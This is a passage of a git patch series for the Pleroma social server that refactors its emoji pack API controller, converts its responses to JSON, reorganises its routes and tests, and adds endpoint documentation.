+ {name, pack}
+ else
+ {name, put_in(pack, ["pack", "can-download"], false)}
+ end
end
defp can_download?(pack, pack_path) do
@@ -159,6 +161,7 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
|> Map.get(:body)
|> Jason.decode!()
|> Map.get(name)
+
pfiles = full_pack["files"]
pack_info_res =
From 8790365fef9d5f76b7ac1c94933e2ee218e76285 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 18:52:21 +0300
Subject: [PATCH 161/272] Remove unused variable
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 2 --
1 file changed, 2 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 22619f4d7..8ef6ae71f 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -162,8 +162,6 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
|> Jason.decode!()
|> Map.get(name)
- pfiles = full_pack["files"]
-
pack_info_res =
case full_pack["pack"] do
%{"share-files" => true, "can-download" => true, "download-sha256" => sha} ->
From 8f509e6d1ee8955fc430d1f4ed7929ba0d91177c Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 18:59:31 +0300
Subject: [PATCH 162/272] Use with w/ pack_info_res
---
.../web/emoji_api/emoji_api_controller.ex | 52 ++++++++-----------
1 file changed, 23 insertions(+), 29 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 8ef6ae71f..9e0ff0b28 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -183,42 +183,36 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
{:error, "The pack was not set as shared and there is no fallback src to download from"}
end
- case pack_info_res do
- {:ok, %{sha: sha, uri: uri} = pinfo} ->
- sha = Base.decode16!(sha)
- emoji_archive = Tesla.get!(uri).body
+ with {:ok, %{sha: sha, uri: uri} = pinfo} <- pack_info_res,
+ %{body: emoji_archive} <- Tesla.get!(uri),
+ {_, true} <- {:sha, Base.decode16!(sha) == :crypto.hash(:sha256, emoji_archive)} do
+ local_name = data["as"] || name
+ pack_dir = Path.join(@emoji_dir_path, local_name)
+ File.mkdir_p!(pack_dir)
- got_sha = :crypto.hash(:sha256, emoji_archive)
+ files = Enum.map(full_pack["files"], fn {_, path} -> to_charlist(path) end)
+ # Fallback cannot contain a pack.json file
+ files = if pinfo[:fallback], do: files, else: ['pack.json'] ++ files
- if got_sha == sha do
- local_name = data["as"] || name
- pack_dir = Path.join(@emoji_dir_path, local_name)
- File.mkdir_p!(pack_dir)
+ {:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
- # Fallback cannot contain a pack.json file
- files = Enum.map(full_pack["files"], fn {_, path} -> to_charlist(path) end)
- # Fallback cannot contain a pack.json file
- files = if pinfo[:fallback], do: files, else: ['pack.json'] ++ files
+ # Fallback can't contain a pack.json file, since that would cause the fallback-src-sha256
+ # in it to depend on itself
+ if pinfo[:fallback] do
+ pack_file_path = Path.join(pack_dir, "pack.json")
- {:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
-
- # Fallback can't contain a pack.json file, since that would cause the fallback-src-sha256
- # in it to depend on itself
- if pinfo[:fallback] do
- pack_file_path = Path.join(pack_dir, "pack.json")
-
- File.write!(pack_file_path, Jason.encode!(full_pack, pretty: true))
- end
-
- conn |> text("ok")
- else
- conn
- |> put_status(:internal_server_error)
- |> text("SHA256 for the pack doesn't match the one sent by the server")
- end
+ File.write!(pack_file_path, Jason.encode!(full_pack, pretty: true))
+ end
+ text(conn, "ok")
+ else
{:error, e} ->
conn |> put_status(:internal_server_error) |> text(e)
+
+ {:sha, _} ->
+ conn
+ |> put_status(:internal_server_error)
+ |> text("SHA256 for the pack doesn't match the one sent by the server")
end
end
From cb125ffaf7f744e60fc134ef6b7b847d3838922a Mon Sep 17 00:00:00 2001
From: vaartis
Date: Wed, 11 Sep 2019 16:00:48 +0000
Subject: [PATCH 163/272] Apply suggestion to
lib/pleroma/web/emoji_api/emoji_api_controller.ex
---
.../web/emoji_api/emoji_api_controller.ex | 34 ++++++++-----------
1 file changed, 15 insertions(+), 19 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 9e0ff0b28..28eaf5ae3 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -124,26 +124,22 @@ def download_shared(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
pack_file = Path.join(pack_dir, "pack.json")
- if File.exists?(pack_file) do
- pack = Jason.decode!(File.read!(pack_file))
-
- if can_download?(pack, pack_dir) do
- zip_result = make_archive(name, pack, pack_dir)
-
- conn
- |> send_download({:binary, zip_result}, filename: "#{name}.zip")
- else
- {:error,
- conn
- |> put_status(:forbidden)
- |> text("Pack #{name} cannot be downloaded from this instance, either pack sharing\
- was disabled for this pack or some files are missing")}
- end
+ with {_, true} <- {:exists?, File.exists?(pack_file)},
+ pack = Jason.decode!(File.read!(pack_file)),
+ {_, true} <- {:can_download?, can_download?(pack, pack_dir)} do
+ zip_result = make_archive(name, pack, pack_dir)
+ send_download(conn, {:binary, zip_result}, filename: "#{name}.zip")
else
- {:error,
- conn
- |> put_status(:not_found)
- |> text("Pack #{name} does not exist")}
+ {:can_download?, _} ->
+ conn
+ |> put_status(:forbidden)
+ |> text("Pack #{name} cannot be downloaded from this instance, either pack sharing\
+ was disabled for this pack or some files are missing")
+
+ {:exists?, _} ->
+ conn
+ |> put_status(:not_found)
+ |> text("Pack #{name} does not exist")
end
end
From f24731788ef9dcbeb29c9dc5db9270a5787caff6 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 19:01:21 +0300
Subject: [PATCH 164/272] Move emoji pack list from /list to /
---
lib/pleroma/web/router.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 1252048f0..17f7406fd 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -229,7 +229,7 @@ defmodule Pleroma.Web.Router do
scope "/packs" do
# Pack info / downloading
- get("/list", EmojiAPIController, :list_packs)
+ get("/", EmojiAPIController, :list_packs)
get("/download_shared/:name", EmojiAPIController, :download_shared)
end
end
From 7c784128fd8016e133c59e9c5076fa2d77a9bdee Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 19:39:47 +0300
Subject: [PATCH 165/272] Change emoji api responses to JSON
---
.../web/emoji_api/emoji_api_controller.ex | 316 ++++++++++--------
test/web/emoji_api_controller_test.exs | 36 +-
2 files changed, 186 insertions(+), 166 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 28eaf5ae3..1c5b7c687 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -6,7 +6,7 @@ defmodule Pleroma.Web.EmojiAPI.EmojiAPIController do
def reload(conn, _params) do
Pleroma.Emoji.reload()
- conn |> text("ok")
+ conn |> json("ok")
end
@emoji_dir_path Path.join(
@@ -133,13 +133,15 @@ def download_shared(conn, %{"name" => name}) do
{:can_download?, _} ->
conn
|> put_status(:forbidden)
- |> text("Pack #{name} cannot be downloaded from this instance, either pack sharing\
- was disabled for this pack or some files are missing")
+ |> json(%{
+ error: "Pack #{name} cannot be downloaded from this instance, either pack sharing\
+ was disabled for this pack or some files are missing"
+ })
{:exists?, _} ->
conn
|> put_status(:not_found)
- |> text("Pack #{name} does not exist")
+ |> json(%{error: "Pack #{name} does not exist"})
end
end
@@ -200,15 +202,15 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
File.write!(pack_file_path, Jason.encode!(full_pack, pretty: true))
end
- text(conn, "ok")
+ json(conn, "ok")
else
{:error, e} ->
- conn |> put_status(:internal_server_error) |> text(e)
+ conn |> put_status(:internal_server_error) |> json(%{error: e})
{:sha, _} ->
conn
|> put_status(:internal_server_error)
- |> text("SHA256 for the pack doesn't match the one sent by the server")
+ |> json(%{error: "SHA256 for the pack doesn't match the one sent by the server"})
end
end
@@ -228,11 +230,11 @@ def create(conn, %{"name" => name}) do
Jason.encode!(%{pack: %{}, files: %{}})
)
- conn |> text("ok")
+ conn |> json("ok")
else
conn
|> put_status(:conflict)
- |> text("A pack named \"#{name}\" already exists")
+ |> json(%{error: "A pack named \"#{name}\" already exists"})
end
end
@@ -244,10 +246,12 @@ def delete(conn, %{"name" => name}) do
case File.rm_rf(pack_dir) do
{:ok, _} ->
- conn |> text("ok")
+ conn |> json("ok")
{:error, _} ->
- conn |> put_status(:internal_server_error) |> text("Couldn't delete the pack #{name}")
+ conn
+ |> put_status(:internal_server_error)
+ |> json(%{error: "Couldn't delete the pack #{name}"})
end
end
@@ -281,7 +285,7 @@ def update_metadata(conn, %{"pack_name" => name, "new_data" => new_data}) do
{:has_all_files?, _} ->
conn
|> put_status(:bad_request)
- |> text("The fallback archive does not have all files specified in pack.json")
+ |> json(%{error: "The fallback archive does not have all files specified in pack.json"})
end
end
@@ -302,6 +306,25 @@ defp update_metadata_and_send(conn, full_pack, new_data, pack_file_p) do
json(conn, new_data)
end
+ defp get_filename(%{"filename" => filename}), do: filename
+
+ defp get_filename(%{"file" => file}) do
+ case file do
+ %Plug.Upload{filename: filename} -> filename
+ url when is_binary(url) -> Path.basename(url)
+ end
+ end
+
+ defp empty?(str), do: String.trim(str) == ""
+
+ defp update_file_and_send(conn, updated_full_pack, pack_file_p) do
+ # Write the emoji pack file
+ File.write!(pack_file_p, Jason.encode!(updated_full_pack, pretty: true))
+
+ # Return the modified file list
+ json(conn, updated_full_pack["files"])
+ end
+
@doc """
Updates a file in a pack.
@@ -316,157 +339,154 @@ defp update_metadata_and_send(conn, full_pack, new_data, pack_file_p) do
(from the current filename to `new_filename`)
- `remove` removes the emoji named `shortcode` and it's associated file
"""
+
+ # Add
def update_file(
conn,
- %{"pack_name" => pack_name, "action" => action, "shortcode" => shortcode} = params
+ %{"pack_name" => pack_name, "action" => "add", "shortcode" => shortcode} = params
) do
pack_dir = Path.join(@emoji_dir_path, pack_name)
pack_file_p = Path.join(pack_dir, "pack.json")
full_pack = Jason.decode!(File.read!(pack_file_p))
- res =
- case action do
- "add" ->
- unless Map.has_key?(full_pack["files"], shortcode) do
- filename =
- if Map.has_key?(params, "filename") do
- params["filename"]
- else
- case params["file"] do
- %Plug.Upload{filename: filename} -> filename
- url when is_binary(url) -> Path.basename(url)
- end
- end
+ with {_, false} <- {:has_shortcode, Map.has_key?(full_pack["files"], shortcode)},
+ filename <- get_filename(params),
+ false <- empty?(shortcode),
+ false <- empty?(filename) do
+ file_path = Path.join(pack_dir, filename)
- unless String.trim(shortcode) |> String.length() == 0 or
- String.trim(filename) |> String.length() == 0 do
- file_path = Path.join(pack_dir, filename)
-
- # If the name contains directories, create them
- if String.contains?(file_path, "/") do
- File.mkdir_p!(Path.dirname(file_path))
- end
-
- case params["file"] do
- %Plug.Upload{path: upload_path} ->
- # Copy the uploaded file from the temporary directory
- File.copy!(upload_path, file_path)
-
- url when is_binary(url) ->
- # Download and write the file
- file_contents = Tesla.get!(url).body
- File.write!(file_path, file_contents)
- end
-
- updated_full_pack = put_in(full_pack, ["files", shortcode], filename)
-
- {:ok, updated_full_pack}
- else
- {:error,
- conn
- |> put_status(:bad_request)
- |> text("shortcode or filename cannot be empty")}
- end
- else
- {:error,
- conn
- |> put_status(:conflict)
- |> text("An emoji with the \"#{shortcode}\" shortcode already exists")}
- end
-
- "remove" ->
- if Map.has_key?(full_pack["files"], shortcode) do
- {emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
-
- emoji_file_path = Path.join(pack_dir, emoji_file_path)
-
- # Delete the emoji file
- File.rm!(emoji_file_path)
-
- # If the old directory has no more files, remove it
- if String.contains?(emoji_file_path, "/") do
- dir = Path.dirname(emoji_file_path)
-
- if Enum.empty?(File.ls!(dir)) do
- File.rmdir!(dir)
- end
- end
-
- {:ok, updated_full_pack}
- else
- {:error,
- conn |> put_status(:bad_request) |> text("Emoji \"#{shortcode}\" does not exist")}
- end
-
- "update" ->
- if Map.has_key?(full_pack["files"], shortcode) do
- with %{"new_shortcode" => new_shortcode, "new_filename" => new_filename} <- params do
- unless String.trim(new_shortcode) |> String.length() == 0 or
- String.trim(new_filename) |> String.length() == 0 do
- # First, remove the old shortcode, saving the old path
- {old_emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
- old_emoji_file_path = Path.join(pack_dir, old_emoji_file_path)
- new_emoji_file_path = Path.join(pack_dir, new_filename)
-
- # If the name contains directories, create them
- if String.contains?(new_emoji_file_path, "/") do
- File.mkdir_p!(Path.dirname(new_emoji_file_path))
- end
-
- # Move/Rename the old filename to a new filename
- # These are probably on the same filesystem, so just rename should work
- :ok = File.rename(old_emoji_file_path, new_emoji_file_path)
-
- # If the old directory has no more files, remove it
- if String.contains?(old_emoji_file_path, "/") do
- dir = Path.dirname(old_emoji_file_path)
-
- if Enum.empty?(File.ls!(dir)) do
- File.rmdir!(dir)
- end
- end
-
- # Then, put in the new shortcode with the new path
- updated_full_pack =
- put_in(updated_full_pack, ["files", new_shortcode], new_filename)
-
- {:ok, updated_full_pack}
- else
- {:error,
- conn
- |> put_status(:bad_request)
- |> text("new_shortcode or new_filename cannot be empty")}
- end
- else
- _ ->
- {:error,
- conn
- |> put_status(:bad_request)
- |> text("new_shortcode or new_file were not specified")}
- end
- else
- {:error,
- conn |> put_status(:bad_request) |> text("Emoji \"#{shortcode}\" does not exist")}
- end
-
- _ ->
- {:error, conn |> put_status(:bad_request) |> text("Unknown action: #{action}")}
+ # If the name contains directories, create them
+ if String.contains?(file_path, "/") do
+ File.mkdir_p!(Path.dirname(file_path))
end
- case res do
- {:ok, updated_full_pack} ->
- # Write the emoji pack file
- File.write!(pack_file_p, Jason.encode!(updated_full_pack, pretty: true))
+ case params["file"] do
+ %Plug.Upload{path: upload_path} ->
+ # Copy the uploaded file from the temporary directory
+ File.copy!(upload_path, file_path)
- # Return the modified file list
- conn |> json(updated_full_pack["files"])
+ url when is_binary(url) ->
+ # Download and write the file
+ file_contents = Tesla.get!(url).body
+ File.write!(file_path, file_contents)
+ end
- {:error, e} ->
- e
+ updated_full_pack = put_in(full_pack, ["files", shortcode], filename)
+ update_file_and_send(conn, updated_full_pack, pack_file_p)
+ else
+ {:has_shortcode, _} ->
+ conn
+ |> put_status(:conflict)
+ |> json(%{error: "An emoji with the \"#{shortcode}\" shortcode already exists"})
+
+ true ->
+ conn
+ |> put_status(:bad_request)
+ |> json(%{error: "shortcode or filename cannot be empty"})
end
end
+ # Remove
+ def update_file(conn, %{
+ "pack_name" => pack_name,
+ "action" => "remove",
+ "shortcode" => shortcode
+ }) do
+ pack_dir = Path.join(@emoji_dir_path, pack_name)
+ pack_file_p = Path.join(pack_dir, "pack.json")
+
+ full_pack = Jason.decode!(File.read!(pack_file_p))
+
+ if Map.has_key?(full_pack["files"], shortcode) do
+ {emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
+
+ emoji_file_path = Path.join(pack_dir, emoji_file_path)
+
+ # Delete the emoji file
+ File.rm!(emoji_file_path)
+
+ # If the old directory has no more files, remove it
+ if String.contains?(emoji_file_path, "/") do
+ dir = Path.dirname(emoji_file_path)
+
+ if Enum.empty?(File.ls!(dir)) do
+ File.rmdir!(dir)
+ end
+ end
+
+ update_file_and_send(conn, updated_full_pack, pack_file_p)
+ else
+ conn
+ |> put_status(:bad_request)
+ |> json(%{error: "Emoji \"#{shortcode}\" does not exist"})
+ end
+ end
+
+ # Update
+ def update_file(
+ conn,
+ %{"pack_name" => pack_name, "action" => "update", "shortcode" => shortcode} = params
+ ) do
+ pack_dir = Path.join(@emoji_dir_path, pack_name)
+ pack_file_p = Path.join(pack_dir, "pack.json")
+
+ full_pack = Jason.decode!(File.read!(pack_file_p))
+
+ with {_, true} <- {:has_shortcode, Map.has_key?(full_pack["files"], shortcode)},
+ %{"new_shortcode" => new_shortcode, "new_filename" => new_filename} <- params,
+ false <- empty?(new_shortcode),
+ false <- empty?(new_filename) do
+ # First, remove the old shortcode, saving the old path
+ {old_emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
+ old_emoji_file_path = Path.join(pack_dir, old_emoji_file_path)
+ new_emoji_file_path = Path.join(pack_dir, new_filename)
+
+ # If the name contains directories, create them
+ if String.contains?(new_emoji_file_path, "/") do
+ File.mkdir_p!(Path.dirname(new_emoji_file_path))
+ end
+
+ # Move/Rename the old filename to a new filename
+ # These are probably on the same filesystem, so just rename should work
+ :ok = File.rename(old_emoji_file_path, new_emoji_file_path)
+
+ # If the old directory has no more files, remove it
+ if String.contains?(old_emoji_file_path, "/") do
+ dir = Path.dirname(old_emoji_file_path)
+
+ if Enum.empty?(File.ls!(dir)) do
+ File.rmdir!(dir)
+ end
+ end
+
+ # Then, put in the new shortcode with the new path
+ updated_full_pack = put_in(updated_full_pack, ["files", new_shortcode], new_filename)
+ update_file_and_send(conn, updated_full_pack, pack_file_p)
+ else
+ {:has_shortcode, _} ->
+ conn
+ |> put_status(:bad_request)
+ |> json(%{error: "Emoji \"#{shortcode}\" does not exist"})
+
+ true ->
+ conn
+ |> put_status(:bad_request)
+ |> json(%{error: "new_shortcode or new_filename cannot be empty"})
+
+ _ ->
+ conn
+ |> put_status(:bad_request)
+ |> json(%{error: "new_shortcode or new_file were not specified"})
+ end
+ end
+
+ def update_file(conn, %{"action" => action}) do
+ conn
+ |> put_status(:bad_request)
+ |> json(%{error: "Unknown action: #{action}"})
+ end
+
@doc """
Imports emoji from the filesystem.
@@ -493,7 +513,7 @@ def import_from_fs(conn, _params) do
{:error, _} ->
conn
|> put_status(:internal_server_error)
- |> text("Error accessing emoji pack directory")
+ |> json(%{error: "Error accessing emoji pack directory"})
end
end
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 8b2a942ce..7942a7b01 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -101,14 +101,14 @@ test "downloading shared & unshared packs from another instance via download_fro
}
|> Jason.encode!()
)
- |> text_response(200) == "ok"
+ |> json_response(200) == "ok"
assert File.exists?("#{@emoji_dir_path}/test_pack2/pack.json")
assert File.exists?("#{@emoji_dir_path}/test_pack2/blank.png")
assert conn
|> delete(emoji_api_path(conn, :delete, "test_pack2"))
- |> response(200) == "ok"
+ |> json_response(200) == "ok"
refute File.exists?("#{@emoji_dir_path}/test_pack2")
@@ -130,14 +130,14 @@ test "downloading shared & unshared packs from another instance via download_fro
}
|> Jason.encode!()
)
- |> text_response(200) == "ok"
+ |> json_response(200) == "ok"
assert File.exists?("#{@emoji_dir_path}/test_pack_nonshared2/pack.json")
assert File.exists?("#{@emoji_dir_path}/test_pack_nonshared2/blank.png")
assert conn
|> delete(emoji_api_path(conn, :delete, "test_pack_nonshared2"))
- |> response(200) == "ok"
+ |> json_response(200) == "ok"
refute File.exists?("#{@emoji_dir_path}/test_pack_nonshared2")
end
@@ -225,15 +225,15 @@ test "when the fallback source doesn't have all the files", ctx do
conn = build_conn()
- assert conn
- |> assign(:user, ctx[:admin])
- |> post(
- emoji_api_path(conn, :update_metadata, "test_pack"),
- %{
- "new_data" => new_data
- }
- )
- |> text_response(:bad_request) =~ "does not have all"
+ assert (conn
+ |> assign(:user, ctx[:admin])
+ |> post(
+ emoji_api_path(conn, :update_metadata, "test_pack"),
+ %{
+ "new_data" => new_data
+ }
+ )
+ |> json_response(:bad_request))["error"] =~ "does not have all"
end
end
@@ -267,9 +267,9 @@ test "updating pack files" do
conn = conn |> assign(:user, admin)
- assert conn
- |> post(emoji_api_path(conn, :update_file, "test_pack"), same_name)
- |> text_response(:conflict) =~ "already exists"
+ assert (conn
+ |> post(emoji_api_path(conn, :update_file, "test_pack"), same_name)
+ |> json_response(:conflict))["error"] =~ "already exists"
assert conn
|> post(emoji_api_path(conn, :update_file, "test_pack"), different_name)
@@ -350,7 +350,7 @@ test "creating and deleting a pack" do
"test_created"
)
)
- |> text_response(200) == "ok"
+ |> json_response(200) == "ok"
assert File.exists?("#{@emoji_dir_path}/test_created/pack.json")
@@ -361,7 +361,7 @@ test "creating and deleting a pack" do
assert conn
|> delete(emoji_api_path(conn, :delete, "test_created"))
- |> response(200) == "ok"
+ |> json_response(200) == "ok"
refute File.exists?("#{@emoji_dir_path}/test_created/pack.json")
end
From 3971bf9c5f00d12a0a2048eb3676069d58a9f243 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 21:43:16 +0300
Subject: [PATCH 166/272] Change :sha to :checksum
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 1c5b7c687..0d4a17c61 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -183,7 +183,7 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
with {:ok, %{sha: sha, uri: uri} = pinfo} <- pack_info_res,
%{body: emoji_archive} <- Tesla.get!(uri),
- {_, true} <- {:sha, Base.decode16!(sha) == :crypto.hash(:sha256, emoji_archive)} do
+ {_, true} <- {:checksum, Base.decode16!(sha) == :crypto.hash(:sha256, emoji_archive)} do
local_name = data["as"] || name
pack_dir = Path.join(@emoji_dir_path, local_name)
File.mkdir_p!(pack_dir)
@@ -207,7 +207,7 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
{:error, e} ->
conn |> put_status(:internal_server_error) |> json(%{error: e})
- {:sha, _} ->
+ {:checksum, _} ->
conn
|> put_status(:internal_server_error)
|> json(%{error: "SHA256 for the pack doesn't match the one sent by the server"})
From 6cd651a38be898456c06d8fee7fd15f1b406848c Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 21:50:55 +0300
Subject: [PATCH 167/272] Make the emoji controller api more RESTy
---
lib/pleroma/web/router.ex | 10 +++++-----
test/web/emoji_api_controller_test.exs | 2 +-
2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 17f7406fd..bae25c60a 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -220,17 +220,17 @@ defmodule Pleroma.Web.Router do
post("/import_from_fs", EmojiAPIController, :import_from_fs)
- post("/update_file/:pack_name", EmojiAPIController, :update_file)
- post("/update_metadata/:pack_name", EmojiAPIController, :update_metadata)
- post("/create/:name", EmojiAPIController, :create)
- delete("/delete/:name", EmojiAPIController, :delete)
+ post("/:pack_name/update_file", EmojiAPIController, :update_file)
+ post("/:pack_name/update_metadata", EmojiAPIController, :update_metadata)
+ put("/:name", EmojiAPIController, :create)
+ delete("/:name", EmojiAPIController, :delete)
post("/download_from", EmojiAPIController, :download_from)
end
scope "/packs" do
# Pack info / downloading
get("/", EmojiAPIController, :list_packs)
- get("/download_shared/:name", EmojiAPIController, :download_shared)
+ get("/:name/download_shared/", EmojiAPIController, :download_shared)
end
end
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 7942a7b01..e92e92f74 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -343,7 +343,7 @@ test "creating and deleting a pack" do
assert conn
|> put_req_header("content-type", "application/json")
- |> post(
+ |> put(
emoji_api_path(
conn,
:create,
From dd818bdd487149b75295abd351e3dee3e7378dd7 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 22:39:26 +0300
Subject: [PATCH 168/272] Add documentation for the emoji endpoints
---
docs/api/pleroma_api.md | 66 +++++++++++++++++++++++++++++++++++++++++
1 file changed, 66 insertions(+)
diff --git a/docs/api/pleroma_api.md b/docs/api/pleroma_api.md
index 30fac77da..a7e7fbe25 100644
--- a/docs/api/pleroma_api.md
+++ b/docs/api/pleroma_api.md
@@ -365,3 +365,69 @@ The status posting endpoint takes an additional parameter, `in_reply_to_conversa
* Params:
* `recipients`: A list of ids of users that should receive posts to this conversation. This will replace the current list of recipients, so submit the full list. The owner of owner of the conversation will always be part of the set of recipients, though.
* Response: JSON, statuses (200 - healthy, 503 unhealthy)
+
+
+## `POST /api/pleroma/emoji/reload`
+### Reload the instance's custom emoji
+* Method `POST`
+* Authentication: required
+* Params: None
+* Response: JSON, "ok" and 200 status
+
+## `PUT /api/pleroma/emoji/packs/:name`
+### Creates an empty custom emoji pack
+* Method `PUT`
+* Authentication: required
+* Params: None
+* Response: JSON, "ok" and 200 status or 409 if the pack with that name already exists
+
+## `DELETE /api/pleroma/emoji/packs/:name`
+### Delete a custom emoji pack
+* Method `DELETE`
+* Authentication: required
+* Params: None
+* Response: JSON, "ok" and 200 status or 500 if there was an error deleting the pack
+
+## `POST /api/pleroma/emoji/packs/:name/update_file`
+### Update a file in a custom emoji pack
+* Method `POST`
+* Authentication: required
+* Params:
+ * if the `action` is `add`, adds an emoji named `shortcode` to the pack `pack_name`,
+ that means that the emoji file needs to be uploaded with the request
+ (thus requiring it to be a multipart request) and be named `file`.
+ There can also be an optional `filename` that will be the new emoji file name
+ (if it's not there, the name will be taken from the uploaded file).
+ * if the `action` is `update`, changes emoji shortcode
+ (from `shortcode` to `new_shortcode` or moves the file (from the current filename to `new_filename`)
+ * if the `action` is `remove`, removes the emoji named `shortcode` and it's associated file
+* Response: JSON, updated "files" section of the pack and 200 status, 409 if the trying to use a shortcode
+ that is already taken, 400 if there was an error with the shortcode, filename or file (additional info
+ in the "error" part of the response JSON)
+
+## `POST /api/pleroma/emoji/packs/:name/update_metadata`
+### Updates (replaces) pack metadata
+* Method `POST`
+* Authentication: required
+* Params:
+ * `new_data`: new metadata to replace the old one
+* Response: JSON, updated "metadata" section of the pack and 200 status or 400 if there was a
+ problem with the new metadata (the error is specified in the "error" part of the response JSON)
+
+## `POST /api/pleroma/emoji/packs/download_from`
+### Requests the instance to download the pack from another instance
+* Method `POST`
+* Authentication: required
+* Params:
+ * `instance_address`: the address of the instance to download from
+ * `pack_name`: the pack to download from that instance
+* Response: JSON, "ok" and 200 status if the pack was downloaded, or 500 if there were
+ errors downloading the pack
+
+## `GET /api/pleroma/emoji/packs/:name/download_shared`
+### Requests the instance to download the pack from another instance
+* Method `GET`
+* Authentication: not requires
+* Params: None
+* Response: the archive of the pack with a 200 status code, 403 if the pack is not set as shared,
+ 404 if the pack does not exist
From 74fb6d864760ccaa18b9a20d148c590254779454 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 22:43:00 +0300
Subject: [PATCH 169/272] Move EmojiAPIController from EmojiAPI to PleromaAPI
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 2 +-
lib/pleroma/web/router.ex | 2 +-
test/web/emoji_api_controller_test.exs | 2 +-
3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 0d4a17c61..a83f8af57 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -1,4 +1,4 @@
-defmodule Pleroma.Web.EmojiAPI.EmojiAPIController do
+defmodule Pleroma.Web.PleromaAPI.EmojiAPIController do
use Pleroma.Web, :controller
require Logger
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index bae25c60a..715e4ba68 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -207,7 +207,7 @@ defmodule Pleroma.Web.Router do
get("/moderation_log", AdminAPIController, :list_log)
end
- scope "/api/pleroma/emoji", Pleroma.Web.EmojiAPI do
+ scope "/api/pleroma/emoji", Pleroma.Web.PleromaAPI do
scope [] do
pipe_through([:admin_api, :oauth_write])
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index e92e92f74..38d11cdce 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -1,4 +1,4 @@
-defmodule Pleroma.Web.EmojiAPI.EmojiAPIControllerTest do
+defmodule Pleroma.Web.PleromaAPI.EmojiAPIControllerTest do
use Pleroma.Web.ConnCase
import Tesla.Mock
From 36f2275dc9f6c58163e4e07f8ace9d75e96033c7 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 11 Sep 2019 22:58:55 +0300
Subject: [PATCH 170/272] A feature for shareable emoji packs, use it in
download_from & tests
---
.../web/emoji_api/emoji_api_controller.ex | 115 ++++++++++--------
.../web/nodeinfo/nodeinfo_controller.ex | 1 +
test/web/emoji_api_controller_test.exs | 22 ++++
3 files changed, 88 insertions(+), 50 deletions(-)
